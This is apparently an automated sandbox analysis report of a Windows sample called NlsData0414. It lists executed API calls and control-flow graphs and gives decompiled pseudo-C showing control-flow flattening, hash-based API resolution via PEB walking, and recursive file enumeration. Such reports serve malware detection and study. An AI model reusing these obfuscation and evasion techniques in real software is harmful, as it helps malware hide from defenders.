2b1fd2 7146->7153 7147 2b2208 7148 2b2212 7148->7147 7149 2b4220 GetPEB 7148->7149 7149->7147 7150 2b42c0 GetPEB 7150->7153 7151 2b3f00 GetPEB 7151->7153 7152 2b3e60 GetPEB 7152->7153 7153->7147 7153->7148 7153->7150 7153->7151 7153->7152 7078 2bb110 7079 2bb124 7078->7079 7080 2b6060 GetPEB 7079->7080 7089 2bb1aa 7079->7089 7081 2bb136 7080->7081 7082 2b3310 GetPEB 7081->7082 7083 2bb14c 7082->7083 7084 2b3f00 GetPEB 7083->7084 7087 2bb182 7083->7087 7085 2bb176 7084->7085 7086 2b3e60 GetPEB 7085->7086 7086->7087 7088 2b3f00 GetPEB 7087->7088 7087->7089 7090 2bb19e 7088->7090 7091 2b3e60 GetPEB 7090->7091 7091->7089

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 002A0448
                                                          • Part of subcall function 002A1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002A0EFD,00000000), ref: 002A1155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 002A0463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002A0484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 002A048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 002A0492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 002A049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002A04A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002A04B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002A04E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002A04F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 002A0519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 002A0530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 002A0547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 002A0562
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 963790ad2e9de9f110da7592bda0a6bb879303e881341dcde7b83fb2c1592c65
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: C44150B59243406FE710EB61C846F6FB3EDAB8A760F408D1DB74897281DE74D9248F62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 375 2b38f0-2b390b 376 2b3910-2b3915 375->376 377 2b391b 376->377 378 2b3a69-2b3a6e 376->378 379 2b3a5f-2b3a64 377->379 380 2b3921-2b3926 377->380 381 2b3acc-2b3adf call 2b34c0 378->381 382 2b3a70-2b3a75 378->382 379->376 383 2b392c-2b3931 380->383 384 2b3a17-2b3a1e 380->384 403 2b3afc-2b3b17 381->403 404 2b3ae1-2b3af7 call 2b3f00 call 2b3e60 381->404 386 2b3a77-2b3a7e 382->386 387 2b3ab6-2b3abb 382->387 393 2b3b70-2b3b77 383->393 394 2b3937-2b393c 383->394 390 2b3a3b-2b3a4f FindFirstFileW 384->390 391 2b3a20-2b3a36 call 2b3f00 call 2b3e60 384->391 388 2b3a9b-2b3ab1 386->388 389 2b3a80-2b3a96 call 2b3f00 call 2b3e60 386->389 387->376 392 2b3ac1-2b3acb 387->392 388->376 389->388 400 2b3b97-2b3ba1 390->400 401 2b3a55-2b3a5a 390->401 391->390 398 2b3b79-2b3b8f call 2b3f00 call 2b3e60 393->398 399 2b3b94 393->399 394->387 402 2b3942-2b3947 394->402 398->399 399->400 401->376 409 2b394d-2b3953 402->409 410 2b39f1-2b3a12 402->410 424 2b3b19-2b3b2f call 2b3f00 call 2b3e60 403->424 425 2b3b34-2b3b3f 403->425 404->403 416 2b3955-2b395d 409->416 417 2b3974-2b3976 409->417 410->376 421 2b396d-2b3972 416->421 428 2b395f-2b3963 416->428 420 2b3978-2b398b call 2b34c0 417->420 417->421 437 2b39a8-2b39ec call 2b38f0 call 2b3460 420->437 438 2b398d-2b39a3 call 2b3f00 call 2b3e60 420->438 421->376 424->425 440 2b3b5c-2b3b6b 425->440 441 2b3b41-2b3b57 call 2b3f00 call 2b3e60 425->441 428->417 433 2b3965-2b396b 428->433 433->417 433->421 437->376 438->437 440->376 441->440
                                                        C-Code - Quality: 63%
                                                        			E002B38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x2be430 == 0) {
                                                        								 *0x2be430 = E002B3E60(_t56, E002B3F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x2bdba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E002B3E60(_t56, E002B3F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x2bdba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E002B34C0(0x2bd290);
                                                        											_t50 =  *0x2be158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E002B3E60(_t56, E002B3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x2be158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E002B38F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E002B3460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E002B34C0(0x2bd260);
                                                        					_t24 =  *0x2be158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E002B3E60(_t56, E002B3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x2be158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x2be494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E002B3E60(_t56, E002B3F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x2be494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x2bdf30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E002B3E60(_t56, E002B3F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x2bdf30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x2bdf88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E002B3E60(_t56, E002B3F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x2bdf88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x002b38fa
                                                        0x002b38fc
                                                        0x002b38fe
                                                        0x002b3902
                                                        0x002b3907
                                                        0x002b3910
                                                        0x002b3910
                                                        0x002b3910
                                                        0x002b3915
                                                        0x00000000
                                                        0x00000000
                                                        0x002b391b
                                                        0x002b3a5f
                                                        0x00000000
                                                        0x002b3921
                                                        0x002b3926
                                                        0x002b3a1e
                                                        0x002b3a36
                                                        0x002b3a36
                                                        0x002b3a48
                                                        0x002b3a4a
                                                        0x002b3a4f
                                                        0x002b3ba1
                                                        0x002b3a55
                                                        0x002b3a55
                                                        0x00000000
                                                        0x002b3a55
                                                        0x002b392c
                                                        0x002b3931
                                                        0x002b3b70
                                                        0x002b3b77
                                                        0x002b3b8a
                                                        0x002b3b8f
                                                        0x002b3b8f
                                                        0x00000000
                                                        0x002b3b95
                                                        0x002b393c
                                                        0x002b3ab6
                                                        0x002b3abb
                                                        0x00000000
                                                        0x002b3acb
                                                        0x002b3acb
                                                        0x002b3acb
                                                        0x002b3942
                                                        0x002b3947
                                                        0x002b39fd
                                                        0x002b3a06
                                                        0x002b3a0d
                                                        0x002b394d
                                                        0x002b3953
                                                        0x002b3974
                                                        0x002b3976
                                                        0x00000000
                                                        0x002b3978
                                                        0x002b3982
                                                        0x002b3984
                                                        0x002b398b
                                                        0x002b399e
                                                        0x002b39a3
                                                        0x002b39a3
                                                        0x002b39bc
                                                        0x002b39d8
                                                        0x002b39dd
                                                        0x002b39e2
                                                        0x002b39e7
                                                        0x002b39e7
                                                        0x002b3955
                                                        0x002b3955
                                                        0x002b395d
                                                        0x002b396d
                                                        0x002b396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x002b395d
                                                        0x002b3953
                                                        0x00000000
                                                        0x002b3947
                                                        0x002b393c
                                                        0x002b3926
                                                        0x00000000
                                                        0x002b391b
                                                        0x002b3a6e
                                                        0x002b3ad6
                                                        0x002b3ad8
                                                        0x002b3adf
                                                        0x002b3af2
                                                        0x002b3af7
                                                        0x002b3af7
                                                        0x002b3b0b
                                                        0x002b3b0d
                                                        0x002b3b12
                                                        0x002b3b17
                                                        0x002b3b2a
                                                        0x002b3b2f
                                                        0x002b3b2f
                                                        0x002b3b36
                                                        0x002b3b38
                                                        0x002b3b3f
                                                        0x002b3b52
                                                        0x002b3b57
                                                        0x002b3b57
                                                        0x002b3b60
                                                        0x002b3b62
                                                        0x002b3b66
                                                        0x00000000
                                                        0x002b3a70
                                                        0x002b3a75
                                                        0x00000000
                                                        0x002b3a77
                                                        0x002b3a77
                                                        0x002b3a7e
                                                        0x002b3a91
                                                        0x002b3a96
                                                        0x002b3a96
                                                        0x002b3aa1
                                                        0x002b3aa5
                                                        0x002b3aac
                                                        0x00000000
                                                        0x002b3aac
                                                        0x002b3a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 002B3A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: a926ba0fd09ce425a0b570abfd608b62b7b432809fd54e8dd2baf8bf16b51bd6
                                                        • Instruction ID: 4b81980d5617c45cc83b9d9c8f320f596a71ce900ba4d414abcf4e8da5a4dead
                                                        • Opcode Fuzzy Hash: a926ba0fd09ce425a0b570abfd608b62b7b432809fd54e8dd2baf8bf16b51bd6
                                                        • Instruction Fuzzy Hash: 4A5146317346024BCF24EF68A8456FB36A69BD07C4F100A2AF546C7392EE75CF644792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 586 2b5040-2b5057 587 2b505c 586->587 588 2b5060-2b5066 587->588 589 2b51af-2b51b5 588->589 590 2b506c 588->590 593 2b51bb 589->593 594 2b52f9-2b52ff 589->594 591 2b5072-2b5078 590->591 592 2b5367-2b536e 590->592 595 2b507a 591->595 596 2b50f9-2b50ff 591->596 599 2b538b-2b5396 592->599 600 2b5370-2b5386 call 2b3f00 call 2b3e60 592->600 601 2b51c1-2b51c7 593->601 602 2b5277-2b527e 593->602 597 2b52e8-2b52ee 594->597 598 2b5301-2b5308 594->598 605 2b507c-2b5082 595->605 606 2b50c2-2b50c9 595->606 607 2b5153-2b515a 596->607 608 2b5101-2b5107 596->608 609 2b53b9-2b53c0 597->609 610 2b52f4 597->610 613 2b530a-2b5320 call 2b3f00 call 2b3e60 598->613 614 2b5325-2b5330 598->614 633 2b5398-2b53ae call 2b3f00 call 2b3e60 599->633 634 2b53b3-2b53b6 599->634 600->599 603 2b526d-2b5272 601->603 604 2b51cd-2b51d3 601->604 611 2b529b-2b52c5 602->611 612 2b5280-2b5296 call 2b3f00 call 2b3e60 602->612 603->588 604->597 623 2b51d9-2b51e0 604->623 616 2b50ad-2b50c0 605->616 617 2b5084-2b508a 605->617 619 2b50cb-2b50e1 call 2b3f00 call 2b3e60 606->619 620 2b50e6-2b50e9 606->620 626 2b515c-2b5172 call 2b3f00 call 2b3e60 607->626 627 2b5177-2b5182 607->627 608->597 624 2b510d-2b5114 608->624 610->587 649 2b52e2 611->649 650 2b52c7-2b52dd call 2b3f00 call 2b3e60 611->650 612->611 613->614 642 2b534d-2b535b RtlAllocateHeap 614->642 643 2b5332-2b5348 call 2b3f00 call 2b3e60 614->643 616->588 617->597 628 2b5090-2b50ab call 2b42c0 617->628 619->620 651 2b50ef-2b50f4 620->651 635 2b51fd-2b521f 623->635 636 2b51e2-2b51f8 call 2b3f00 call 2b3e60 623->636 637 2b5131-2b514e 624->637 638 2b5116-2b512c call 2b3f00 call 2b3e60 624->638 626->627 659 2b519f-2b51aa 627->659 660 2b5184-2b519a call 2b3f00 call 2b3e60 627->660 628->587 633->634 634->609 635->651 680 2b5225-2b522c 635->680 636->635 637->587 638->637 642->609 661 2b535d-2b5362 642->661 643->642 649->597 650->649 651->587 659->587 660->659 661->587 688 2b5249-2b5268 680->688 689 2b522e-2b5244 call 2b3f00 call 2b3e60 680->689 688->588 689->688
                                                        C-Code - Quality: 61%
                                                        			E002B5040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x2be494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x2be494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x2bdd18;
                                                        								if( *0x2bdd18 == 0) {
                                                        									 *0x2bdd18 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x2be484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E002B3E60(_t58, E002B3F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x2be484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x2be18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E002B3E60(_t58, E002B3F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x2be18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x2be29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E002B3E60(_t58, E002B3F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x2be29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x2bde08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x2bde08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x2be494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x2be494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x2bdf30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x2bdf30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x2be494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x2be494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x2bdf30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E002B3E60(_t58, E002B3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x2bdf30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x2be270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E002B3E60(_t58, E002B3F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x2be270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x2be200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E002B3E60(_t58, E002B3F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x2be200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E002B42C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x002b5047
                                                        0x002b504b
                                                        0x002b504d
                                                        0x002b5051
                                                        0x002b5053
                                                        0x002b5057
                                                        0x002b505c
                                                        0x002b505c
                                                        0x002b5060
                                                        0x002b5060
                                                        0x002b5060
                                                        0x002b5066
                                                        0x00000000
                                                        0x00000000
                                                        0x002b51af
                                                        0x002b51b5
                                                        0x002b52f9
                                                        0x002b52ff
                                                        0x00000000
                                                        0x002b5301
                                                        0x002b5301
                                                        0x002b5306
                                                        0x002b5308
                                                        0x002b531b
                                                        0x002b5320
                                                        0x002b5320
                                                        0x002b5327
                                                        0x002b532e
                                                        0x002b5330
                                                        0x002b5348
                                                        0x002b5348
                                                        0x002b5355
                                                        0x002b5357
                                                        0x002b5359
                                                        0x002b535b
                                                        0x002b535d
                                                        0x002b505c
                                                        0x002b505c
                                                        0x00000000
                                                        0x002b505c
                                                        0x002b505c
                                                        0x002b535b
                                                        0x002b51bb
                                                        0x002b51bb
                                                        0x002b5277
                                                        0x002b527c
                                                        0x002b527e
                                                        0x002b5291
                                                        0x002b5296
                                                        0x002b5296
                                                        0x002b52ac
                                                        0x002b52b0
                                                        0x002b52b2
                                                        0x002b52bd
                                                        0x002b52c3
                                                        0x002b52c5
                                                        0x002b52d8
                                                        0x002b52dd
                                                        0x002b52dd
                                                        0x002b52e6
                                                        0x00000000
                                                        0x002b51c1
                                                        0x002b51c1
                                                        0x002b51c7
                                                        0x002b526d
                                                        0x00000000
                                                        0x002b51cd
                                                        0x002b51cd
                                                        0x002b51d3
                                                        0x002b52e8
                                                        0x002b52e8
                                                        0x002b52ee
                                                        0x002b505c
                                                        0x002b505c
                                                        0x00000000
                                                        0x002b505c
                                                        0x002b505c
                                                        0x002b51d9
                                                        0x002b51d9
                                                        0x002b51de
                                                        0x002b51e0
                                                        0x002b51f3
                                                        0x002b51f8
                                                        0x002b51f8
                                                        0x002b521b
                                                        0x002b521d
                                                        0x002b521f
                                                        0x002b50ef
                                                        0x002b50ef
                                                        0x002b505c
                                                        0x002b505c
                                                        0x00000000
                                                        0x002b505c
                                                        0x002b5225
                                                        0x002b5225
                                                        0x002b522a
                                                        0x002b522c
                                                        0x002b523f
                                                        0x002b5244
                                                        0x002b5244
                                                        0x002b5249
                                                        0x002b524e
                                                        0x002b525b
                                                        0x002b525d
                                                        0x002b525f
                                                        0x002b5261
                                                        0x002b5265
                                                        0x00000000
                                                        0x002b5265
                                                        0x00000000
                                                        0x002b521f
                                                        0x002b51d3
                                                        0x002b51c7
                                                        0x002b51bb
                                                        0x002b53c0
                                                        0x002b53c0
                                                        0x00000000
                                                        0x002b53c0
                                                        0x002b506c
                                                        0x002b5367
                                                        0x002b536c
                                                        0x002b536e
                                                        0x002b5381
                                                        0x002b5386
                                                        0x002b5386
                                                        0x002b538d
                                                        0x002b538f
                                                        0x002b5394
                                                        0x002b5396
                                                        0x002b53a9
                                                        0x002b53ae
                                                        0x002b53ae
                                                        0x00000000
                                                        0x002b53b7
                                                        0x002b5072
                                                        0x002b5078
                                                        0x002b50f9
                                                        0x002b50ff
                                                        0x002b5153
                                                        0x002b5158
                                                        0x002b515a
                                                        0x002b516d
                                                        0x002b5172
                                                        0x002b5172
                                                        0x002b5179
                                                        0x002b517b
                                                        0x002b5180
                                                        0x002b5182
                                                        0x002b5195
                                                        0x002b519a
                                                        0x002b519a
                                                        0x002b51a3
                                                        0x002b51a5
                                                        0x00000000
                                                        0x002b5101
                                                        0x002b5101
                                                        0x002b5107
                                                        0x00000000
                                                        0x002b510d
                                                        0x002b510d
                                                        0x002b5112
                                                        0x002b5114
                                                        0x002b5127
                                                        0x002b512c
                                                        0x002b512c
                                                        0x002b5139
                                                        0x002b513b
                                                        0x002b513d
                                                        0x002b514b
                                                        0x002b505c
                                                        0x002b505c
                                                        0x00000000
                                                        0x002b505c
                                                        0x002b505c
                                                        0x002b5107
                                                        0x002b507a
                                                        0x002b507a
                                                        0x002b50c2
                                                        0x002b50c7
                                                        0x002b50c9
                                                        0x002b50dc
                                                        0x002b50e1
                                                        0x002b50e1
                                                        0x002b50ed
                                                        0x00000000
                                                        0x002b507c
                                                        0x002b5082
                                                        0x002b50ad
                                                        0x002b50b0
                                                        0x002b50b2
                                                        0x002b50ba
                                                        0x00000000
                                                        0x002b5084
